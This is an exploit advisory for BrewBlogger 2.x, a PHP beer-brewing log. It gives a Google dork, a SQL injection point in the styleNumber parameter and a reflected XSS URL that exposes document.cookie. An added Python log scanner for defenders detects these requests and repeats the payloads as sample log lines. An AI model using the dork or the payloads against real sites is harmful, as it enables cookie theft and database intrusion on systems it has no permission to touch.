
BrewBlogger 2.x.x SQLi/XSS vulnerabilities

Author: TUNISIAN CYBER , Published: 04-01-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: BrewBlogger 2.x.x SQLi/XSS vulnerabilities
[+] Date: 31-12-2013
[+] Category: WebApp
[+] Version: 2.X.X (1.X.X could be affected too)
[+] Google Dork: :intext:"BrewBlogger Personal Edition developed by zkdigital.com"
[+] Tested on: KaliLinux
[+] Vendor: http://sourceforge.net/projects/brewblogger/
[+] Friend's blog: www.na3il.com



########################################################################################
v2.3.2 sqli/XSS ('Brendan Coles')
http://1337day.com/exploit/16383

+Description:
BrewBlogger is an easy to set up, easy to use, web-based beer homebrewing log.
It is a PHP/MySQL-based system that gives today's brewer not only an easy way to record their beer brewing activities,
but also a blog-like forum to share their efforts.


+Exploit:
BrewBlogger suffers from SQLi and XSS vulnerabilities:

1/SQLi:
http://127.0.0.1/BrewBlogger2.x.x/brewblogger/sections/reference.inc.php?source=log&section=styles&styleNumber=[SQL]
LocalTest>http://i.imgur.com/ymuyxVS.png

2/XSS:
http://127.0.0.1/BrewBlogger2.3.1/brewblogger/index.php?page=brewBlogList&style=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cp+%22
LocalTest>http://i.imgur.com/AYu8Rl9.png

./3nD
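
Added example (not part of the original advisory and not BrewBlogger code): a log check for defenders that flags requests hitting the two parameters named above, styleNumber on sections/reference.inc.php and style on index.php?page=brewBlogList. Assumptions: combined-format access logs, a legitimate styleNumber being a short alphanumeric code, the function names, and the sample log lines, which are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate styleNumber is a short alphanumeric code (e.g. "12").
STYLE_NUMBER_OK = re.compile(r"[A-Za-z0-9]{1,4}")
# Characters that let a reflected value break out of an HTML attribute or tag.
HTML_BREAKOUT = re.compile(r'[<>"]')
# Request line of an Apache/nginx combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
_PFX = '203.0.113.5 - - [04/Jan/2014:10:00:00 +0000] "GET '
_REF = "/BrewBlogger2.x.x/brewblogger/sections/reference.inc.php?source=log&section=styles"
_IDX = "/BrewBlogger2.3.1/brewblogger/index.php?page=brewBlogList"
SAMPLE_LOG = [
    _PFX + _REF + '&styleNumber=12 HTTP/1.1" 200 900',
    _PFX + _REF + '&styleNumber=1%27 HTTP/1.1" 200 120',
    _PFX + _IDX + '&style=Stout HTTP/1.1" 200 4100',
    _PFX + _IDX + '&style=%22%3E%3Cscript%3Ealert%28document.cookie%29'
                  '%3C/script%3E%3Cp+%22 HTTP/1.1" 200 4300',
]

def classify(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded
    findings = []
    if parts.path.endswith("/sections/reference.inc.php"):
        if any(not STYLE_NUMBER_OK.fullmatch(v) for v in params.get("styleNumber", [])):
            findings.append("sqli-suspect:styleNumber")
    if parts.path.endswith("/index.php") and "brewBlogList" in params.get("page", []):
        if any(HTML_BREAKOUT.search(v) for v in params.get("style", [])):
            findings.append("xss-suspect:style")
    return findings

def scan(log_lines):
    """Return (line_number, findings) for every log line that trips a check."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

The same allow-list idea applies server-side: reject a styleNumber that fails the pattern before it reaches the query, and HTML-encode style before it is echoed into the page.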

########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt , Exploit4arabTeam
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################
